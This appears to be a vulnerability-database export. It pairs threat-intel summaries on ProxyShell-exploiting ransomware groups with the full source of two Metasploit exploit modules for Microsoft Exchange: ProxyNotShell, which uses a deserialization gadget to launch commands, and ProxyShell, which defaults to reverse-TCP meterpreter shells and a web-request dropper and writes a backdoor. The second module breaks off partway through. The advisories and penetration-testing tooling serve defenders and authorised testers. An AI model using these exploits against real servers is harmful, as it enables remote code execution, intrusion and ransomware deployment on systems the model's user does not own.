Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n#### References\n\n<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>\n\n<https://www.bleepingcomputer.com/news/security/lockfile-ransomware-uses-petitpotam-attack-to-hijack-windows-domains/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-24T10:35:48", "type": "hivepro", "title": "ProxyShell and PetitPotam exploits weaponized by LockFile Ransomware Group", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-24T10:35:48", "id": "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "href": "https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-27T15:34:57", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 430 5 2 Worldwide 17 46 The fourth week of April 2022 witnessed the discovery of 430 vulnerabilities out of which 5 gained the attention of Threat Actors and security researchers worldwide. Among these 5, there was 1 zero-day, and 1 vulnerability that was awaiting analysis on the National Vulnerability Database (NVD). Hive Pro Threat Research Team has curated a list of 5 CVEs that require immediate action. Further, we also observed Two Threat Actor groups being highly active in the last week. Lazarus, a North Korea threat actor group popular for financial crime and gain, was observed targeting blockchain technology and the cryptocurrency industry using a new malware TraderTraitor and Hive ransomware group was seen using the ProxyShell vulnerabilities to target organizations all around the world. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34473 CVE-2021-34523 CVE-2021-31207 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 CVE-2022-0540 https://www.atlassian.com/software/jira/core/download https://www.atlassian.com/software/jira/update CVE-2022-29072* Not Available Active Actors: Icon Name Origin Motive Lazarus Group (APT38, BlueNoroff, and Stardust Chollima) North Korea Financial crime and gain Hive Ransomware Group Unknown Financial crime and gain Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1588: Obtain Capabilities T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1136: Create Account T1134: Access Token Manipulation T1134: Access Token Manipulation T1110: Brute Force T1083: File and Directory Discovery T1570: Lateral Tool Transfer T1560: Archive Collected Data T1071: Application Layer Protocol T1567: Exfiltration Over Web Service T1486: Data Encrypted for Impact T1588.005: Exploits T1566: Phishing T1059.007: JavaScript T1136.002: Domain Account T1543: Create or Modify System Process T1140: Deobfuscate/Decode Files or Information T1003: OS Credential Dumping T1135: Network Share Discovery T1021: Remote Services T1560.001: Archive via Utility T1071.001: Web Protocols T1496: Resource Hijacking T1588.006: Vulnerabilities T1566.001: Spearphishing Attachment T1059.001: PowerShell T1053: Scheduled Task/Job T1068: Exploitation for Privilege Escalation T1562: Impair Defenses T1003.005: Cached Domain Credentials T1057: Process Discovery T1021.001: Remote Desktop Protocol T1005: Data from Local System T1105: Ingress Tool Transfer T1566.002: Spearphishing Link T1059.003: Windows Command Shell T1053.005: Scheduled Task T1053: Scheduled Task/Job T1562.001: Disable or Modify Tools T1018: Remote System Discovery T1021.002: SMB/Windows Admin Shares T1113: Screen Capture T1078: Valid Accounts T1106: Native API T1078: Valid Accounts T1053.005: Scheduled Task T1070: Indicator Removal on Host T1518: Software Discovery T1021.006: Windows Remote Management T1078.002: Domain Accounts T1053: Scheduled Task/Job T1078.002: Domain Accounts T1078: Valid Accounts T1553: Subvert Trust Controls T1518.001: Security Software Discovery T1053.005: Scheduled Task T1078.002: Domain Accounts T1078: Valid Accounts T1049: System Network Connections Discovery T1204: User Execution T1078.002: Domain Accounts T1204.002: Malicious File T1047: Windows Management Instrumentation Threat Advisories: Bypass Authentication vulnerability in Atlassian Jira Seraph Hive Ransomware targets organizations with ProxyShell exploit Lazarus is back, targeting organizations with cryptocurrency thefts via TraderTraitor malware What will be the consequence of this disputed vulnerability in 7-ZIP?", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T12:44:38", "type": "hivepro", "title": "Weekly Threat Digest: 18 \u2013 24 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-0540", "CVE-2022-29072"], "modified": "2022-04-27T12:44:38", "id": "HIVEPRO:09525E3475AC1C5F429611A90182E82F", "href": "https://www.hivepro.com/weekly-threat-digest-18-24-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:24:49", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Federal Bureau of Investigation and Cybersecurity and Infrastructure Security Agency released threat advisories on AvosLocker Ransomware. It is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations in critical infrastructure sectors such as financial services, manufacturing plants, and government facilities in countries such as the United States, Saudi Arabia, the United Kingdom, Germany, Spain, and the United Arab Emirates, among others. After it's affiliates infect targets, AvosLocker claims to handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data. The AvosLocker ransomware is a multi-threaded C++ Windows executable that operates as a console application and displays a log of actions performed on victim computers. For the delivery of the ransomware payload, the attackers use spam email campaigns as the initial infection vector. The threat actors exploits Proxy Shell vulnerabilities CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, as well as CVE-2021-26855 to gain access to victim\u2019s machine and then they deploy Mimikatz to steal passwords. Furthermore, threat actors can use the detected credentials to get RDP access to the domain controller and then exfiltrate data from the compromised machine. Finally, the attacker installs AvosLocker ransomware on the victim's computer and then encrypts the victim's documents and files with the ".avos" extension. The actor then leaves a ransom letter in each directory named "GET YOUR FILES BACK.txt" with a link to an AvosLocker .onion payment site. The Organizations can mitigate the risk by following the recommendations: \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. The MITRE TTPs commonly used by Avoslocker are: TA0001: Initial AccessTA0002: ExecutionTA0007: DiscoveryTA0040: ImpactT1566: PhishingT1204: User ExecutionT1082: System Information DiscoveryT1490: Inhibit System RecoveryT1489: Service StopT1486: Data Encrypted for Impact Actor Detail Vulnerability Details Indicators of Compromise (IoCs) Patches https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 Recent Breaches https://www.unical.com/ https://www.paccity.net/ https://www.gigabyte.com/ Reference https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-24T06:30:44", "type": "hivepro", "title": "AvosLocker Ransomware group has targeted 50+ Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-24T06:30:44", "id": "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "href": "https://www.hivepro.com/avoslocker-ransomware-group-has-targeted-50-organizations-worldwide/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-08-11T21:08:01", "description": "This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019. These vulnerabilities were patched in November 2022.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-18T22:00:27", "type": "metasploit", "title": "Microsoft Exchange ProxyNotShell RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-28T15:06:14", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYNOTSHELL_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxynotshell_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HTTP::Exchange\n include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyNotShell RCE',\n 'Description' => %q{\n This module chains two vulnerabilities on Microsoft Exchange Server\n that, when combined, allow an authenticated attacker to interact with\n the Exchange Powershell backend (CVE-2022-41040), where a\n deserialization flaw can be leveraged to obtain code execution\n (CVE-2022-41082). This exploit only support Exchange Server 2019.\n\n These vulnerabilities were patched in November 2022.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery of ProxyShell SSRF\n 'Spencer McIntyre', # Metasploit module\n 'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis\n 'Piotr Bazyd\u0142o', # Vulnerability analysis\n 'Rich Warren', # EEMS bypass via ProxyNotRelay\n 'Soroush Dalili' # EEMS bypass\n ],\n 'References' => [\n [ 'CVE', '2022-41040' ], # ssrf\n [ 'CVE', '2022-41082' ], # rce\n [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],\n [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],\n [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],\n [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]\n ],\n 'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyNotShell'],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n\n register_options([\n OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),\n OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ])\n ])\n\n register_advanced_options([\n OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])\n ])\n end\n\n def check\n @ssrf_email ||= Faker::Internet.email\n res = send_http('GET', '/mapi/nspi/')\n return CheckCode::Unknown if res.nil?\n return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401\n return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'\n\n # actually run the powershell cmdlet and see if it works, this will fail if:\n # * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)\n # * the exchange emergency mitigation service M1 rule is in place\n return CheckCode::Safe unless execute_powershell('Get-Mailbox')\n\n CheckCode::Vulnerable\n rescue Msf::Exploit::Failed => e\n CheckCode::Safe(e.to_s)\n end\n\n def ibm037(string)\n string.encode('IBM037').force_encoding('ASCII-8BIT')\n end\n\n def send_http(method, uri, opts = {})\n opts[:authentication] = {\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD'],\n 'preferred_auth' => 'NTLM'\n }\n\n if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'\n uri = \"/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}\"\n opts[:headers] = {\n 'X-Up-Devcap-Post-Charset' => 'IBM037',\n # technique needs the \"UP\" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362\n 'User-Agent' => \"UP #{datastore['UserAgent']}\"\n }\n else\n uri = \"/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}\"\n end\n\n super(method, uri, opts)\n end\n\n def exploit\n # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not\n # work on Exchange Server 2016\n if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)\n vprint_status(\"Detected Exchange version: #{version}\")\n if version < Rex::Version.new('15.2')\n fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')\n end\n end\n\n @ssrf_email ||= Faker::Internet.email\n\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n execute_command(payload.encoded)\n when :windows_dropper\n execute_cmdstager({ linemax: 7_500 })\n end\n end\n\n def execute_command(cmd, _opts = {})\n xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root\n <ResourceDictionary\n xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\"\n xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\"\n xmlns:System=\"clr-namespace:System;assembly=mscorlib\"\n xmlns:Diag=\"clr-namespace:System.Diagnostics;assembly=system\">\n <ObjectDataProvider x:Key=\"LaunchCalch\" ObjectType=\"{x:Type Diag:Process}\" MethodName=\"Start\">\n <ObjectDataProvider.MethodParameters>\n <System:String>cmd.exe</System:String>\n <System:String>/c #{cmd.encode(xml: :text)}</System:String>\n </ObjectDataProvider.MethodParameters>\n </ObjectDataProvider>\n </ResourceDictionary>\n XAML\n\n identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root\n <Obj N=\"V\" RefId=\"14\">\n <TN RefId=\"1\">\n <T>System.ServiceProcess.ServiceController</T>\n <T>System.Object</T>\n </TN>\n <ToString>Object</ToString>\n <Props>\n <S N=\"Name\">Type</S>\n <Obj N=\"TargetTypeForDeserialization\">\n <TN RefId=\"1\">\n <T>System.Exception</T>\n <T>System.Object</T>\n </TN>\n <MS>\n <BA N=\"SerializationData\">\n #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}\n </BA>\n </MS>\n </Obj>\n </Props>\n <S>\n <![CDATA[#{xaml}]]>\n </S>\n </Obj>\n IDENTITY\n\n execute_powershell('Get-Mailbox', args: [\n { name: '-Identity', value: identity }\n ])\n end\nend\n\nclass XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream\n include Msf::Util::DotNetDeserialization\n\n def self.generate\n from_values([\n Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),\n Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(\n class_info: Types::General::ClassInfo.new(\n obj_id: 1,\n name: 'System.UnitySerializationHolder',\n member_names: %w[Data UnityType AssemblyName]\n ),\n member_type_info: Types::General::MemberTypeInfo.new(\n binary_type_enums: %i[String Primitive String],\n additional_infos: [ 8 ]\n ),\n member_values: [\n Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(\n obj_id: 2,\n string: 'System.Windows.Markup.XamlReader'\n )),\n 4,\n Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(\n obj_id: 3,\n string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'\n ))\n ]\n ),\n Types::RecordValues::MessageEnd.new\n ])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_proxynotshell_rce.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-07T01:57:48", "description": "This module exploits a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15, Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5, Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9. All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-18T14:50:34", "type": "metasploit", "title": "Microsoft Exchange ProxyShell RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-12-02T20:58:50", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyShell RCE',\n 'Description' => %q{\n This module exploits a vulnerability on Microsoft Exchange Server that\n allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an\n arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15,\n Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5,\n Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9.\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery\n 'Jang (@testanull)', # Vulnerability analysis\n 'PeterJson', # Vulnerability analysis\n 'brandonshi123', # Vulnerability analysis\n 'mekhalleh (RAMELLA S\u00e9bastien)', # exchange_proxylogon_rce template\n 'Donny Maasland', # Procedure optimizations (email enumeration)\n 'Rich Warren', # Procedure optimizations (email enumeration)\n 'Spencer McIntyre', # Metasploit module\n 'wvu' # Testing\n ],\n 'References' => [\n [ 'CVE', '2021-34473' ],\n [ 'CVE', '2021-34523' ],\n [ 'CVE', '2021-31207' ],\n [ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ],\n [ 'URL', 'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ],\n [ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ],\n [ 'URL', 'https://github.com/dmaasland/proxyshell-poc' ]\n ],\n 'DisclosureDate' => '2021-04-06', # pwn2own 2021\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyShell'],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [false, 'A known email address for this organization']),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]),\n ])\n\n register_advanced_options([\n OptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']),\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002'])\n ])\n end\n\n def check\n @ssrf_email ||= Faker::Internet.email\n res = send_http('GET', '/mapi/nspi/')\n return CheckCode::Unknown if res.nil?\n return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'\n\n CheckCode::Vulnerable\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def request_autodiscover(email)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n '/autodiscover/autodiscover.xml',\n data: XMLTemplate.render('soap_autodiscover', email: email),\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', 